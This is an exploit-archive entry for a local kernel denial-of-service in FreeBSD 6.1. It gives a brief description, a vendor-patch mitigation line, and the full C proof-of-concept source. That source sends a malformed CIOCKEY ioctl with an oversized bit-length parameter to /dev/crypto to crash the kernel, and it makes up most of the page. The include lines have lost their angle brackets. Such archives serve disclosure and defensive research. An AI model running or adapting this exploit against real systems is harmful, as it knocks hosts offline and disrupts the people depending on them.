FreeBSD 6.1 /dev/crypto local kernel DoS

vendor:

FreeBSD

by:

Evgeny Legerov

7,2

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: FreeBSD

Affected Version From: FreeBSD 6.1

Affected Version To: FreeBSD 6.1

Patch Exists: YES

Related CWE: N/A

CPE: o:freebsd:freebsd

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: FreeBSD 6.1

2006

FreeBSD 6.1 /dev/crypto local kernel DoS

This exploit is a local kernel DoS vulnerability in FreeBSD 6.1. It is triggered by an ioctl call to the /dev/crypto device with a malformed parameter. This causes the kernel to crash, resulting in a denial of service.

Mitigation:

The vulnerability can be mitigated by applying the patch provided by the vendor.

Source

Exploit-DB raw data:

// Evgeny Legerov (elegerov.blogspot.com)

#include unistd.h
#include sys/types.h
#include stdio.h
#include fcntl.h
#include crypto/cryptodev.h

int main()
{
        int fd2, fd;
        struct crypt_kop kop;

        printf("FreeBSD 6.1 /dev/crypto local kernel DoS\n");

        fd2 = open("/dev/crypto", O_RDWR, 0);
        if (fd2 == -1){
                perror("open");
                exit(-1);
        }

        if (ioctl(fd2, CRIOGET, &fd) == -1) {
                perror("ioctl");
                exit(-1);
        }

        kop.crk_op = CRK_MOD_EXP;
        kop.crk_iparams = 3;
        kop.crk_oparams = 1;
        kop.crk_param[0].crp_nbits = 0x70000000;

        ioctl(fd, CIOCKEY, &kop);

        printf("exploit failed\n");

        return 0;
}

// milw0rm.com [2006-10-24]